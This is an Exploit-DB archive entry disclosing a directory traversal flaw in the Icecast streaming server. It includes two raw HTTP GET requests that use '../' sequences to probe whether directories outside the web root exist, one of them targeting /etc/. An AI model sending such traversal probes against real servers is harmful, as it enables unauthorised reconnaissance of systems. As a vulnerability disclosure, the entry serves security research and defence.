exploit-db-mirror/exploits/linux/remote/21602.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

10 lines
No EOL
536 B
Text

source: https://www.securityfocus.com/bid/5189/info
Icecast is a freely available, open source streaming audio server. Icecast is available for the Unix, Linux, and Microsoft Windows platforms.
An attacker may exploit a directory traversal vulnerability in Icecast server to determine the existance of a specified directory outside of the web root. This is a result of the server returning different HTTP results for each case.
GET /file/../../../../../../../../nonexistent/ HTTP/1.0
GET /file/../../../../../../../../etc/ HTTP/1.0